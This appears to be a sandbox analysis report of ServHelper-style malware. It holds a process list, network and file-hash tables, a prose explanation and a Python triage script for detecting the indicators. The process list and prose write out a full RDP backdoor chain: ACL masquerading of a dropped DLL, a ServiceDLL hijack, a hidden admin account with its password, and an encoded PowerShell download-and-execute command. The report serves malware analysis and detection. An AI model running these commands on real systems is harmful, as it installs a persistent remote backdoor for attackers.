C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp" "c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
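Read together, the behavioral26 process list is a complete RDP backdoor install, the chain the sandbox tags as ServHelper: the PowerShell stage drops `rfxvmt.dll` into System32 and then uses takeown/icacls to give it a TrustedInstaller-owned, read-execute-only ACL so it looks like a stock system file; `reg.exe` moves the RDP listener to `PortNumber = 0x1C21` (7201/tcp), repoints the TermService `ServiceDLL` at `C:\Windows\branding\mediasrv.png` (a DLL hidden behind a picture extension, also dropped by PowerShell) and sets the `fEnableWddmDriver` policy to 0; `net.exe` adds `NT AUTHORITY\NETWORK SERVICE` (the account TermService runs as) to Administrators, starts `rdpdr` and `TermService`, deletes and recreates the local account `WgaUtilAcc`, puts it and `MRBKYMNO$` in Remote Desktop Users, adds `WgaUtilAcc` to Administrators and resets its password; `wmic` fingerprints the GPU and CPU; an encoded PowerShell command runs, and finally every `.ps1` and `.txt` in `%TEMP%` is deleted. The `-enc` argument is base64 of UTF-16LE text and decodes to `IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1")`, which is the `raw.githubusercontent.com` connection in the Network table.

The Python below is an added triage example, not part of the sandbox report. It decodes `-EncodedCommand` payloads and scans process command lines (including the `cmd /C` wrappers, which it unwraps) for the indicators listed above. Its sample input is copied from the process list on this page; the default RDP port and the default `termsrv.dll` ServiceDLL are facts about Windows, everything else in the script is this example's own.

```python
import base64
import re

# Command lines copied from the behavioral26 process list above (sandbox output),
# including the cmd /C wrappers, so the scanner has to unwrap them itself.
SAMPLE_CMDLINES = [
    r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll',
    r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService',
    r'cmd /C net.exe user WgaUtilAcc 000000 /del',
    r'cmd /C net.exe user WgaUtilAcc bu4XEaZT /add',
    r'C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add',
    r'cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    r'cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    'cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc '
    'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA',
]

DEFAULT_RDP_PORT = 3389
DEFAULT_TERMSRV_DLL = 'termsrv.dll'  # TermService's ServiceDLL normally ends in \System32\termsrv.dll


def tokens(cmdline):
    """Split a Windows command line on whitespace, keeping double-quoted runs together."""
    return [q if q else u for q, u in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def _flag_value(args, flag):
    """Argument following a case-insensitive /flag such as /v or /d, or None."""
    for i, a in enumerate(args[:-1]):
        if a.lower() == flag:
            return args[i + 1]
    return None


def decode_encoded_command(cmdline):
    """Decode a PowerShell -EncodedCommand payload (base64 of UTF-16LE text).
    PowerShell accepts any prefix of the switch name (-e, -ec, -enc, ...)."""
    toks = tokens(cmdline)
    for i, t in enumerate(toks[:-1]):
        if len(t) > 1 and t[0] == '-' and 'encodedcommand'.startswith(t[1:].lower()):
            b64 = toks[i + 1]
            try:
                raw = base64.b64decode(b64 + '=' * (-len(b64) % 4), validate=True)
                return raw.decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def _scan(cmdline, f):
    toks = tokens(cmdline)
    if not toks:
        return
    exe = re.sub(r'\.exe$', '', toks[0].rsplit('\\', 1)[-1].lower())
    args = toks[1:]
    lower = [a.lower() for a in args]
    if exe == 'cmd':  # unwrap "cmd /c <inner command>" and rescan the inner command
        m = re.search(r'(?:^|\s)/c\s+(.*)$', cmdline, re.I)
        if m:
            _scan(m.group(1), f)
    elif exe == 'reg' and lower[:1] == ['add'] and len(args) > 1:
        key = args[1].lower()
        name = (_flag_value(args, '/v') or '').lower()
        data = _flag_value(args, '/d')
        if key.endswith(r'\winstations\rdp-tcp') and name == 'portnumber' and data:
            f['rdp_port'] = int(data, 0)  # reg.exe accepts hex, so 0x1C21 -> 7201
        elif key.endswith(r'\services\termservice\parameters') and name == 'servicedll':
            f['termservice_dll'] = data
    elif exe in ('net', 'net1') and lower:  # net.exe hands off to net1.exe, so both appear
        if lower[0] == 'user' and '/add' in lower and len(args) > 1:
            f['accounts_created'].add(args[1])
        elif lower[0] == 'localgroup' and '/add' in lower and len(args) > 2:
            f['group_adds'].add((args[1], args[2]))
        elif lower[0] == 'start' and len(args) > 1:
            f['services_started'].add(args[1])
    elif exe in ('takeown', 'icacls'):
        target = _flag_value(args, '/f') if exe == 'takeown' else (args[0] if args else None)
        if target:
            f['acl_targets'].add(target)
    elif exe == 'powershell':
        decoded = decode_encoded_command(cmdline)
        if decoded:
            f['decoded_commands'].append(decoded)
            f['urls'].extend(re.findall(r'https?://[^\s"\')]+', decoded))


def triage(cmdlines):
    """Collect the RDP-backdoor indicators from a list of process command lines."""
    f = {'rdp_port': None, 'termservice_dll': None, 'accounts_created': set(),
         'group_adds': set(), 'services_started': set(), 'acl_targets': set(),
         'decoded_commands': [], 'urls': []}
    for c in cmdlines:
        _scan(c, f)
    return f


def indicators(f):
    """Plain-language findings; an empty list means none of the pattern was seen."""
    out = []
    if f['rdp_port'] not in (None, DEFAULT_RDP_PORT):
        out.append(f"RDP listener moved to tcp/{f['rdp_port']}")
    dll = f['termservice_dll']
    if dll and not dll.lower().endswith(DEFAULT_TERMSRV_DLL):
        out.append(f"TermService ServiceDLL repointed to {dll}")
    for group, member in sorted(f['group_adds']):
        if group.lower() in ('administrators', 'remote desktop users'):
            out.append(f"{member} added to local group {group}")
    for acct in sorted(f['accounts_created']):
        out.append(f"local account {acct} created")
    for url in f['urls']:
        out.append(f"encoded PowerShell downloads {url}")
    return out


if __name__ == '__main__':
    for line in indicators(triage(SAMPLE_CMDLINES)):
        print(line)
```

On a live host the same indicators are checked directly rather than from command lines: the `ServiceDLL` value under `HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters` should expand to `termsrv.dll` in System32, `RDP-Tcp\PortNumber` should be 3389 unless deliberately changed, and neither `NETWORK SERVICE` nor an unknown account such as `WgaUtilAcc` should be in Administrators or Remote Desktop Users.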
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/308-59-0x0000000001220000-0x0000000001221000-memory.dmp
memory/308-61-0x00000000010E0000-0x00000000010E2000-memory.dmp
memory/852-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/852-65-0x0000000000E50000-0x0000000000E51000-memory.dmp
memory/852-67-0x0000000000420000-0x0000000000451000-memory.dmp
memory/852-68-0x0000000000360000-0x0000000000361000-memory.dmp
\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/848-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/1384-76-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/848-74-0x0000000075A31000-0x0000000075A33000-memory.dmp
memory/1384-78-0x0000000041580000-0x000000004182A000-memory.dmp
memory/1384-80-0x0000000041052000-0x0000000041054000-memory.dmp
memory/1384-81-0x0000000041054000-0x0000000041056000-memory.dmp
memory/1384-82-0x0000000041056000-0x0000000041057000-memory.dmp
memory/1384-83-0x0000000041057000-0x0000000041058000-memory.dmp
\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/992-86-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
memory/992-90-0x000007FEEA850000-0x000007FEEB8E6000-memory.dmp
memory/1720-91-0x0000000000000000-mapping.dmp
memory/1720-92-0x000007FEFC661000-0x000007FEFC663000-memory.dmp
memory/1720-94-0x000000001AE50000-0x000000001AE51000-memory.dmp
memory/1720-97-0x000000001ADD4000-0x000000001ADD6000-memory.dmp
memory/1720-96-0x000000001ADD0000-0x000000001ADD2000-memory.dmp
memory/992-95-0x0000000001FC0000-0x0000000001FC2000-memory.dmp
memory/1720-93-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1720-98-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
memory/1720-99-0x0000000002590000-0x0000000002591000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1720-101-0x000000001C530000-0x000000001C531000-memory.dmp
memory/432-102-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline
| MD5 | bf25e38a015e718efdc8e65541265c1f |
| SHA1 | aa0ea99e74d158b57c6907126762f106d2f52243 |
| SHA256 | d9151355fdf4b02bc6bcd00a4db75f0f66fb4302b416c5f5f483e15aa9dfd42c |
| SHA512 | 9d50e7e649d57e7fc9b26c8e05f06958aabacd538df4f09453c3f6db3d7f7fb54b910144299c00aa1418271c821deeb7555c1f071cefa220323c1d45dc41cb5b |
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1500-105-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP
| MD5 | e437de9d7d1559a97c188c10be73e921 |
| SHA1 | ec2a03762fa6a218a6e213740438b89ad0d9c2b6 |
| SHA256 | bcaa4a0f33c9c1a57a4158cfc4d59bc62c78b10ffbb1d7208360355e963df2e9 |
| SHA512 | aa46723a7271319d1a80aa3e55a8674473d23d23f1099eda0c11e4393169a3ced55075eee691a9bbb43adae9f6dbc26a9bc14ddb3d7d955a244eba2a28476252 |
C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp
| MD5 | 2fb9db8be02194824abe7f2cbd2b3a3b |
| SHA1 | d93d41c843895fba0340c14b236213544f407196 |
| SHA256 | e7303f5d90a912af457070b1dd5a755324362f31bf28b88243a0eedecf3b5df1 |
| SHA512 | ea713c40f56bd867605cfda18424db7eabc92a9014a529acc399bedb1ab53e250e7f410211ebdbc8db700c772534b7413721a0f6d4ae3f0c676413381ee111ba |
C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.dll
| MD5 | 61868b90f5c380b9edf33a851aa51e64 |
| SHA1 | 3ae38fdb842bc81f99db7155ac7207cc9ace8f54 |
| SHA256 | 674564f37e8b65b207640db7da555d6ee30c5297b57158739f05ecbeaa29a2b1 |
| SHA512 | d0aa28af09b5db8f5a97ef6b495c6bd9386be61f6728eb2b140fd2f2e130f8154067ea1b6cb1124912faf49b59f6d357212ac78ddcf6af4dfbd5d1dc493474d4 |
memory/1720-109-0x0000000002330000-0x0000000002331000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1720-111-0x000000001AC50000-0x000000001AC51000-memory.dmp
memory/1720-112-0x000000001C1F0000-0x000000001C1F1000-memory.dmp
memory/1720-113-0x0000000002890000-0x0000000002891000-memory.dmp
memory/2032-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e64effd491fdabcf3c18722c7384de5a |
| SHA1 | 2c3ff4486756c16acc3c2b4d88625dd5f9d80c36 |
| SHA256 | 8dfd169e7009a909381c661c7963d72357ad0b9caa1cdc3f7962b341428efc9e |
| SHA512 | 7764240798d74494df4f2c435b0650bd9d333e62e2ca59c0349551eceabbd108791b9c222fd2f3af3393b59e755f8446b92f8fcc4aee4429635d918d4f8bb8ed |
memory/2032-120-0x000000001AB80000-0x000000001AB82000-memory.dmp
memory/2032-121-0x000000001AB84000-0x000000001AB86000-memory.dmp
memory/2032-122-0x0000000002310000-0x0000000002311000-memory.dmp
memory/2032-124-0x000000001B870000-0x000000001B871000-memory.dmp
memory/2032-126-0x00000000024E0000-0x00000000024E1000-memory.dmp
memory/2032-127-0x0000000002350000-0x0000000002351000-memory.dmp
memory/1720-128-0x000000001ADDA000-0x000000001ADF9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | b04504c64cf6b4668b80b79a91994e74 |
| SHA1 | ac0b8d169db62a00ebcca0ca0820d5d1ea081740 |
| SHA256 | 42da1aa474834d4b9db794e3c329f6bc82a30bc6a899022d4040b3b9985813c1 |
| SHA512 | e0f26edb2607fdb2f6db18981fa1effbead14c961f3a28379caeb2a1f0f46ee2b31b73a6b4416b950aaf3f0e79db60290243a13412ee55184a35f36b0c57aeae |
memory/2032-133-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22330762-ff7d-40b8-a48f-aa5932dc17c9
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/2032-146-0x000000001B510000-0x000000001B511000-memory.dmp
memory/2032-147-0x000000001B520000-0x000000001B521000-memory.dmp
memory/432-148-0x0000000000000000-mapping.dmp
memory/432-154-0x000000001ABF0000-0x000000001ABF2000-memory.dmp
memory/432-155-0x000000001ABF4000-0x000000001ABF6000-memory.dmp
memory/432-156-0x0000000002300000-0x0000000002301000-memory.dmp
memory/432-158-0x000000001B520000-0x000000001B521000-memory.dmp
memory/432-161-0x00000000024B0000-0x00000000024B1000-memory.dmp
memory/432-160-0x0000000002830000-0x0000000002831000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 13ad9a16e4a7a217929c56cf489d88dd |
| SHA1 | 7969af5e5fa652253d51d6d731799d61f7b310f3 |
| SHA256 | 55a2df3b6ebad90232bfb8e46e9a148eb8905b6eb972baf7d1ed444fe9f5a593 |
| SHA512 | 924409ec1bc3d499db6d5e17b1d2db01dcfad7c0d7481d259aee80f3dbf376fbdfd0dfcd863adaa8b4134f1c62608c31c095ee6c990c987b23f53596cae61bb8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ed7deb5a-bcd2-4fbf-baba-968ccaa37dde
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_afad4144-704c-4daf-abdc-1458b9af5480
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
